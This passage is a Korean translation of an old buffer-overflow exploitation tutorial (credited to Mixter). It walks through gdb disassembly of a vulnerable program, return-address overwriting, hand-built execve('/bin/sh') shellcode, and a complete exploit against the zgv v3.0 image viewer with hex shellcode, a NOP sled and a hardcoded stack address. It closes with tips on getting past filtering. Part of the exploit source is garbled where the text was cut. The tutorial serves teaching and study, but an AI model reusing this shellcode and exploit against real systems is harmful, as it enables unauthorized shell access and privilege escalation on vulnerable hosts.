: pushl %ebp 0x80484c9 : movl %esp,%ebp 0x80484cb : call 0x80484a0 0x80484d0 : leave 0x80484d1 : ret (gdb) disas lame Dump of assembler code for function lame: /* ret 어드레스 바로 앞의 스택 위에 프레임 포인터를 저장 */ 0x80484a0 : pushl %ebp 0x80484a1 : movl %esp,%ebp /* 그 스택을 0x20 또는 32로 확대. 우리의 버퍼는 30개의 문자이지만 메모리는 4바이트가 할당되었고(프로세스가 32비트 단어를 사용하기 때문에), 이것은 char small[30];와 동등함 */ 0x80484a3 : subl $0x20,%esp /* small[30](스택 상의 공간으로, 가장 주소 0xffffffe0(%ebp)에 위치)에 포인터를 로딩하고, gets 함수 gets(small);를 호출 */ 0x80484a6 : leal 0xffffffe0(%ebp),%eax 0x80484a9 : pushl %eax 0x80484aa : call 0x80483ec 0x80484af : addl $0x4,%esp /* 스택 상의 "%s\n" 스트링 주소를 로딩하고, print 함수 printf("%s\n", small);를 호출 */ 0x80484b2 : leal 0xffffffe0(%ebp),%eax 0x80484b5 : pushl %eax 0x80484b6 : pushl $0x804852c 0x80484bb : call 0x80483dc 0x80484c0 : addl $0x8,%esp /* 스택으로부터 리턴 어드레스 0x80484d0를 가지고, 그 주소를 리턴함 */ 0x80484c3 : leave 0x80484c4 : ret End of assembler dump. 3a. 프로그램 오버플로잉 하기 # ./blah xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx # ./blah xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Segmentation fault (core dumped) # gdb blah core (gdb) info registers eax: 0x24 36 ecx: 0x804852f 134513967 edx: 0x1 1 ebx: 0x11a3c8 1156040 esp: 0xbffffdb8 -1073742408 ebp: 0x787878 7895160 ^^^^^^ EBP는 0x787878이며, 이것은 input 버퍼가 통제할 수 있는 것보다 더 많은 데이터를 스택에 썼다는 것을 의미한다. 0x78은 'x'의 6진법식 표현이다. 그 프로세스는 32바이트의 최대 크기를 가지고 있다. 우리는 사용자 입력에 할당된 것보다 더 많은 데이터를 메모리에 썼으며, 그래서 'xxxx'로 EBP와 리턴 어드레스를 덮어썼다. 그리고 그 프로세스는 0x787878에서 다시 실행하려고 시도했으며, 이것은 그것이 segmentation fault가 나도록 야기했다. 3b. 리턴 어드레스 바꾸기 리턴 대신 lame()에 리턴하도록 그 프로그램을 익스플로잇해보자. 우리는 리턴 어드레스를 0x80484d0에서 0x80484cb로 바꾸어야 하며, 그것이 전부다. 메모리에 우리는 31바이트의 버퍼 공간 | 4바이트가 저장된 EBP | 4바이트의 RET을 가지고 있다. 다음은 4바이트의 리턴 어드레스를 1바이트의 문자 버퍼에 입력하기 위한 간단한 프로그램이다. main() { int i=0; char buf[44]; for (i=0;i<=40;i+=4) *(long *) &buf[i] = 0x80484cb; puts(buf); } # ret 皆皆皆皆皆? # (ret;cat)|./blah test <- user input 皆皆皆皆皆?test test <- user input test 이 프로그램은 두번이나 함수를 거쳐 갔다. 만약 오버플로우가 존재한다면 함수들의 리턴 어드레스는 프로그램의 실행 쓰레드를 변경하기 위해 바꿔질 수 있다. _______________________________________________________________________________ 4. 쉘코드 간단히 말해서 쉘코드는 단순히 어셈블러 명령어이며, 그것을 우리는 스택 위에 쓸 수 있으며, 그런다음 스택에 리턴되도록 리턴 어드레스를 바꿀 수 있다. 이 방법을 사용해 우리는 코드를 취약한 프로세스에 삽입할 수 있으며, 그런 다음 스택 바로 위에 그것을 실행할 수 있다. 그러므로, 쉘을 실행하기 위해 삽입할 수 있는 어셈블러 코드를 생성해보자. 일반적인 시스템 호출은 execve()이며, 이것은 현재 프로세스의 실행을 종료시키고 어떤 바이너리도 로딩하여 실행할 수 있다. 맨페이지를 통해 알 수 있는 사용법은 다음과 같다. int execve (const char *filename, char *const argv [], char *const envp[]); glibc2로부터 시스템 호출에 대해 자세히 알아보자. # gdb /lib/libc.so.6 (gdb) disas execve Dump of assembler code for function execve: 0x5da00 : pushl %ebx /* 이것은 실제 syscall이다. 어떤 프로그램이 execve를 호출하기 전에 그것은 스택에 역순으로 독립변수(**envp, **argv, *filename)를 밀어넣는다. */ /* edx 레지스트 안으로 **envp 주소를 입력 */ 0x5da01 : movl 0x10(%esp,1),%edx /* ecx 레지스트 안으로 **argv 주소를 입력 */ 0x5da05 : movl 0xc(%esp,1),%ecx /* ebx 레지스트 안으로 *filename 주소를 입력 */ 0x5da09 : movl 0x8(%esp,1),%ebx /* eax 레지스트에 0xb 입력; 내부 시스템 호출 테이블에서 0xb == execve */ 0x5da0d : movl $0xb,%eax /* execve 명령을 실행하기 위해 커널에 통제권을 줌 */ 0x5da12 : int $0x80 0x5da14 : popl %ebx 0x5da15 : cmpl $0xfffff001,%eax 0x5da1a : jae 0x5da1d <__syscall_error> 0x5da1c : ret End of assembler dump. 4a. 포팅할 수 있는 코드 만들기 우리는 메모리에 있는 독립변수를 참고하지 않고 쉘코드를 만들기 위해 트릭을 사용해야 하는데, 이것은 메모리 페이지에 정확한 주소를 제공함으로써 이루어지고, 이것은 컴파일 시에만 이루어질 수 있다. 일반 우리가 쉘 코드의 크기를 알아낼 수 있다면 우리는 실행 쓰레드에 특정한 수의 바이트를 앞뒤로 보내기 위해 jmp <바이트>와 call <바이트> 명령을 사용할 수 있다. 왜 call을 사용하는가? 우리는 call이 스택 상에 리턴 어드레스를 자동적으로 저장할 기회를 가지고, 그 리턴 어드레스는 call 명령 후에 다음 4바이트가 된다. 변수를 call 바로 뒤에 위치시킴으로써 우리는 간접적으로 그것의 주소를 알지 못해도 스택 상에 밀어넣을 수 있다. 0 jmp (Z 바이트를 앞쪽으로 스킾) 2 popl %esi ... put function(s) here ... Z call <-Z+2> (Z 바이트보다 2 바이트 적게 뒤쪽으로 POPL에 스킾) Z+5 .string (첫번째 변수) 4b. 쉘 코드 global code_start /* 나중에 이것이 필요하며, 신경쓰지 말것 */ global code_end .data code_start: jmp 0x17 popl %esi movl %esi,0x8(%esi) /* 쉘 코드 뒤로 **argv 주소 입력, 그것 뒤에 0x8 바이트, 그래서 /bin/sh가 위치 */ xorl %eax,%eax /* %eax에 0 입력 */ movb %eax,0x7(%esi) /* /bin/sh 스트링 다음에 종료하는 0 입력 */ movl %eax,0xc(%esi) /* 긴 단어의 크기를 알기 위한 다른 0 */ my_execve: movb $0xb,%al /* execve( */ movl %esi,%ebx /* "/bin/sh", */ leal 0x8(%esi),%ecx /* & of "/bin/sh", */ xorl %edx,%edx /* NULL */ int $0x80 /* ); */ call -0x1c .string "/bin/shX" /* X 는 movb %eax,0x7(%esi)에 의해 덮어쓰임 */ code_end: (상대적인 offset는 0x17와 -0x1c는 0x0에 입력하고, 컴파일, 디스어셈블링하고, 그런 다음 그 쉘 코드의 크기를 보고 얻을 수 있다.) 비록 아주 최소한이지만 이것은 이미 작동하는 쉘코드이다. 당신은 적어도 exit() syscall을 디스어셈블링하고 'call' 전에 그것을 attach해야 한다. 쉘코드를 만드는 실제 기술은 또한 코드에 어떤 바이너리 제로를 피하는 피하는 것으로 구성된다. 이 코드를 테스트해보자. /* code.c */ extern void code_start(); extern void code_end(); #include main() { ((void (*)(void)) code_start)(); } # cc -o code code.S code.c # ./code bash# 지금은 쉘코드를 hex char buffer로 전환할 수 있으며, 가장 좋은 방법은 다음과 같이 하는 것이다. #include extern void code_start(); extern void code_end(); main() { fprintf(stderr,"%s",code_start); } 그리고 aconv -h 또는 bin2c.pl을 통해 분석하는 것이며, 이 툴들은 다음에서 구할 수 있다. http://www.dec.net/~dhg or http://members.tripod.com/mixtersecurity _______________________________________________________________________________ 5. 익스플로잇 쓰기 스택상에 입력된 쉘코드를 가리키기 위해 어떻게 리턴 어드레스를 바꾸는지와 샘플용 익스플로잇을 작성하는지 알아보자. 가장 쉬운 방법이라고 생각되는 zgv를 우리는 사용할 것이다. # export HOME=`perl -e 'printf "a" x 2000'` # zgv Segmentation fault (core dumped) # gdb /usr/bin/zgv core #0 0x61616161 in ?? () (gdb) info register esp esp: 0xbffff574 -1073744524 이것은 크래쉬 때 스택의 꼭대기에 있다. 우리가 이것을 우리의 쉘코드에 리턴 어드레스로 사용할 수 있다고 추정하는 것이 더 안전할 것이다. 우리는 지금 우리의 버퍼 앞에 NOP(no operation) 명령을 추가할 것이다. 그래서 메모리에 우리의 쉘코드의 정확한 시작을 예상하는 것에 대해 100% 정확할 필요는 없다. 함수는 우리의 쉘코드 앞의 어느 곳에 있는 스택 위로 리턴할 것이고, NOP을 통해 초기 JMP 명령으로 작동하고, CALL로 점프하고, popl로 다시 점프하고, 스택 상에 우리의 코드를 실행할 것이다. 스택의 모양을 다시 기억하자. 가장 낮은 곳에 메모리 주소, 스택의 꼭대기에 ESP가 가리키고, 초기 변수는 저장되고, 즉 HOME 환경변수를 저장하는 zgv에 버퍼가. 그 다음으로 우리는 저장된 EBP(4바이트)와 이전 함수의 리턴 어드레스를 가진다. 우리는 스택상의 새로운 주소로 리턴 어드레스를 덮어쓰기 위해 그 버퍼 뒤에 8바이트 또는 그 이상을 써야 한다. zgv에 있는 버퍼는 1024 바이트의 크기이다. 당신은 이것을 다음 코드를 보거나 또는 취약함 함수에 있는 초기 subl $0x400,%esp (=1024)를 찾아봄으로써 알 수 있다. 우리는 이제 다음 익스플로잇에 그 모든 부분들을 조합할 것이다. 5a. 샘플 zgv exploit /* zgv v3.0 exploit by Mixter buffer overflow tutorial - http://1337.tsx.org sample exploit, works for example with precompiled redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */ #include #include #include /* This is the minimal shellcode from the tutorial */ static char shellcode[]= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; #define NOP 0x90 #define LEN 1032 #define RET 0xbffff574 int main() { char buffer[LEN]; long retaddr = RET; int i; fprintf(stderr,"using address 0x%lx\n",retaddr); /* 이것은 리턴 어드레스로 전체 버퍼를 채운다. 3b 참고) */ for (i=0;i function() -> strcpy(smallbuffer,getenv("HOME")); 이 지점에서 zgv는 바운드 체킹에 실패하고, smallbuffer 뒤에 쓰고, 메인에 대한 리턴 어드레스는 스택 상의 리턴 어드레스로 덮어쓰이게 된다. function()은 /ret을 떠나고, EIP 포인터는 스택 위를 가리킨다. 0xbffff574 nop 0xbffff575 nop 0xbffff576 nop 0xbffff577 jmp $0x24 1 0xbffff579 popl %esi 3 <--\ | [... shellcode starts here ...] | | 0xbffff59b call -$0x1c 2 <--/ 0xbffff59e .string "/bin/shX" 익스플로잇을 테스트해보자. # cc -o zgx zgx.c # ./zgx using address 0xbffff574 bash# 5b. 익스플로잇 작성에 대한 추가 팁 익스플로잇에 강한 많은 프로그램들이 있지만 여전히 취약한다. 하지만, 필터링이나 그와 유사한 것을 넘어 당신이 할 수 있는 많은 트릭이 있다. 또한 리턴 어드레스를 바꾸지 않고도 할 수 있는 다른 오버플로우 테크닉들도 있다. 소위 포인터 오버플로우라는 것이 있는데, 이것은 함수가 할당하는 포인터가 하나의 오버플로우에 의해 덮어쓰여질 수 있으며, 프로그램 실행 흐름을 변경할 수 있으며(한 예가 RoTShB bind 4.9 exploit), 리턴 어드레스가 쉘환경 포인터를 가리키는 익스플로잇이 있으며, 이것은 쉘코드가 스택상 대신에 위치한다. 또 다른 것은 자가 변경 코드이다. 이것은 초기에는 printable, non-white upper case characters로 구성되어 있었지만 그것이 실행되는 스택상에 쉘코드를 입력하도록 변경된다. _______________________________________________________________________________ 6. 결론 결론 부분은 일반적인 보안 관련 내용이라 생략. 궁금하신 분은 원문 참고하시길....